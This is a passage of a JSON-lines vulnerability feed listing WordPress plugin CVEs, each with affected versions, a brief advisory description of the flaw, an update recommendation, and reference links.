ail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3742","slug":"responsive-lightbox","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Responsive Lightbox & Gallery WordPress plugin before 2.5.1 does not validate and escape some of its attributes before outputting them back in a page\/post, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b8f487b-63a5-4d2a-9b61-ed4d97f18320\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b8f487b-63a5-4d2a-9b61-ed4d97f18320\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10814","slug":"simple-embed-code","versionImpact":"2.5","versionEndExcluding":"2.5.1","description":"The Code Embed plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5 via the ce_get_file() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1e17c9-b9ee-495a-be49-9aa88f8023a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1e17c9-b9ee-495a-be49-9aa88f8023a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-embed-code\\\/trunk\\\/includes\\\/add-embeds.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-embed-code\\\/trunk\\\/includes\\\/add-embeds.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182609\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182609\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6206","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Aiomatic - Automatic AI Content Writer & Editor, GPT-3 & GPT-4, ChatGPT ChatBot & AI Toolkit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aiomatic_image_editor_ajax_submit' function in all versions up to, and including, 2.5.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. In order to exploit the vulnerability, there must be a value entered for the Stability.AI API key. The value can be arbitrary.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369#item-description__changelog\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e0ff2d6-65d2-4a54-b3e5-64b424013313?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e0ff2d6-65d2-4a54-b3e5-64b424013313?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5162","slug":"options-for-twenty-seventeen","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Options for Twenty Seventeen plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'social-links' shortcode in versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df35d8c6-55ec-4cf5-8055-93ec5193c0a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df35d8c6-55ec-4cf5-8055-93ec5193c0a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/options-for-twenty-seventeen\\\/tags\\\/2.5.0\\\/options-for-twenty-seventeen.php#L3110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/options-for-twenty-seventeen\\\/tags\\\/2.5.0\\\/options-for-twenty-seventeen.php#L3110\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971104\\\/options-for-twenty-seventeen\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971104\\\/options-for-twenty-seventeen\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5006","slug":"wp-discord-invite","versionEndExcluding":"2.5.1","description":"The WP Discord Invite WordPress plugin before 2.5.1 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator to submit a crafted request.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d29bcc1c-241b-4867-a0c8-4ae5f9d1c8e8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d29bcc1c-241b-4867-a0c8-4ae5f9d1c8e8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41241","slug":"surecart","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in SureCart WordPress Ecommerce For Creating Fast Online Stores plugin <=\u00a02.5.0 versions.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surecart\\\/wordpress-surecart-plugin-2-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surecart\\\/wordpress-surecart-plugin-2-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6451","slug":"ai-engine","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"AI Engine < 2.4.3 is susceptible to remote-code-execution (RCE) via Log Poisoning. The AI Engine WordPress plugin before 2.5.1 fails to validate the file extension of \"logs_path\", allowing Administrators to change log filetypes from .log to .php.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc06d413-a227-470c-a5b7-cdab57aeab34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc06d413-a227-470c-a5b7-cdab57aeab34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3990","slug":"ht-mega-for-elementor","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tooltip & Popover Widget in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98e74a23-b586-4d6a-b1ab-78838b0eed61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98e74a23-b586-4d6a-b1ab-78838b0eed61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_tooltip.php#L620\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_tooltip.php#L620\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12495","slug":"wp-editor-bootstrap-blocks","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Bootstrap Blocks for WP Editor v2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gtb-bootstrap\/column' block in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213432%40wp-editor-bootstrap-blocks&new=3213432%40wp-editor-bootstrap-blocks&sfp_email=&sfph_mail=#file33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213432%40wp-editor-bootstrap-blocks&new=3213432%40wp-editor-bootstrap-blocks&sfp_email=&sfph_mail=#file33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e9e9afc-89a0-444d-ad5b-975e0f3c19d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e9e9afc-89a0-444d-ad5b-975e0f3c19d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3989","slug":"ht-mega-for-elementor","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Gallery Justify Widget in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074490%40ht-mega-for-elementor&new=3074490%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03fba6bb-ff30-42bb-936b-93c009a7e3f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03fba6bb-ff30-42bb-936b-93c009a7e3f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2286","slug":"sky-elementor-addons","versionImpact":"2.4.0","versionEndExcluding":"2.5.0","description":"The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link URL value in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2821","slug":"search-exclude","versionImpact":"2.4.9","versionEndExcluding":"2.5.0","description":"The Search Exclude plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_rest_permission function in all versions up to, and including, 2.4.9. This makes it possible for unauthenticated attackers to modify plugin settings, excluding content from search results.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-exclude\\\/tags\\\/2.4.6\\\/lib\\\/api\\\/entities\\\/settings\\\/class-post.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/search-exclude\\\/tags\\\/2.4.6\\\/lib\\\/api\\\/entities\\\/settings\\\/class-post.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284798\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284798\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f72a309-8ef8-4943-8e64-38bb7909397a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f72a309-8ef8-4943-8e64-38bb7909397a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3312","slug":"easy-custom-auto-excerpt","versionImpact":"2.4.12","versionEndExcluding":"2.5.0","description":"The Easy Custom Auto Excerpt plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.12. This makes it possible for unauthenticated attackers to obtain excerpts of password-protected posts.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c1e1fe4-23be-4f66-ae9f-cabb83811b71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c1e1fe4-23be-4f66-ae9f-cabb83811b71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071273%40easy-custom-auto-excerpt%2Ftrunk&old=2242878%40easy-custom-auto-excerpt%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071273%40easy-custom-auto-excerpt%2Ftrunk&old=2242878%40easy-custom-auto-excerpt%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3308","slug":"ht-mega-for-elementor","versionImpact":"2.4.9","versionEndExcluding":"2.5.0","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Grid widget's attributes in all versions up to, and including, 2.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33b5e231-1b53-4646-ae9c-48babf1ebbd7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33b5e231-1b53-4646-ae9c-48babf1ebbd7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3307","slug":"ht-mega-for-elementor","versionImpact":"2.4.9","versionEndExcluding":"2.5.0","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown widget's attributes in all versions up to, and including, 2.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8452e54-7a81-4921-b531-8cb3b0953dab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8452e54-7a81-4921-b531-8cb3b0953dab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_countdown.php#L1251\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_countdown.php#L1251\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071480%40ht-mega-for-elementor%2Ftrunk&old=3063395%40ht-mega-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3999","slug":"eazydocs","versionImpact":"2.4.1","versionEndExcluding":"2.5.0","description":"The EazyDocs  WordPress plugin before 2.5.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a8a1deb-6836-40f1-856b-7b3e4ba867d6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a8a1deb-6836-40f1-856b-7b3e4ba867d6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-32499","slug":"radio-station","versionEndExcluding":"2.5.0","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Tony Zeoli, Tony Hayes Radio Station by netmix\u00ae \u2013 Manage and play your Show Schedule in WordPress! plugin <=\u00a02.4.0.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/radio-station\\\/wordpress-radio-station-plugin-2-4-0-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/radio-station\\\/wordpress-radio-station-plugin-2-4-0-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9756","slug":"order-attachments-for-woocommerce","versionImpact":"2.4.1","versionEndExcluding":"2.5.0","description":"The Order Attachments for WooCommerce plugin for WordPress is vulnerable to unauthorized limited arbitrary file uploads due to a missing capability check on the wcoa_add_attachment AJAX action in versions 2.0 to 2.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload limited file types.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfc8957-78b8-4c55-ba95-52d95b086341?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfc8957-78b8-4c55-ba95-52d95b086341?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/tags\\\/2.4.0\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167136%40order-attachments-for-woocommerce&new=3167136%40order-attachments-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167136%40order-attachments-for-woocommerce&new=3167136%40order-attachments-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2168","slug":"ultimate-store-kit","versionImpact":"2.4.1","versionEndExcluding":"2.5.0","description":"The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1. This is due to missing or incorrect nonce validation on the dismiss() function. This makes it possible for unauthenticated attackers to set arbitrary user meta values to `1` which can be leveraged to lock and administrator out of their site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-store-kit\\\/tags\\\/2.3.6\\\/admin\\\/admin-notice.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-store-kit\\\/tags\\\/2.3.6\\\/admin\\\/admin-notice.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255125\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255125\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283438\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283438\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a48634d7-30c9-4124-87dd-93a303a969eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a48634d7-30c9-4124-87dd-93a303a969eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12334","slug":"wc-affiliate","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The WC Affiliate \u2013 A Complete WooCommerce Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via any parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224312\\\/wc-affiliate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224312\\\/wc-affiliate\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efca1ee2-2038-440e-941c-22533b4d833b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efca1ee2-2038-440e-941c-22533b4d833b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3681","slug":"interactive-world-maps","versionImpact":"2.4.14","versionEndExcluding":"2.5","description":"The Interactive World Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search (s) parameter in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9295b82-27c1-4f35-b40c-1ac40ebe5d5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9295b82-27c1-4f35-b40c-1ac40ebe5d5e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/interactive-world-maps\\\/2874264\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/interactive-world-maps\\\/2874264\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5000","slug":"horizontal-scrolling-announcements","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The Horizontal scrolling announcements plugin for WordPress is vulnerable to SQL Injection via the plugin's 'hsas-shortcode' shortcode in versions up to, and including, 2.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/327e706d-2d6c-4204-a531-281f2e2dbcf0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/327e706d-2d6c-4204-a531-281f2e2dbcf0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2827116#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2827116#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2973422#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2973422#L56\",\"refsource\":\"\",\"tags\":[]}]"}
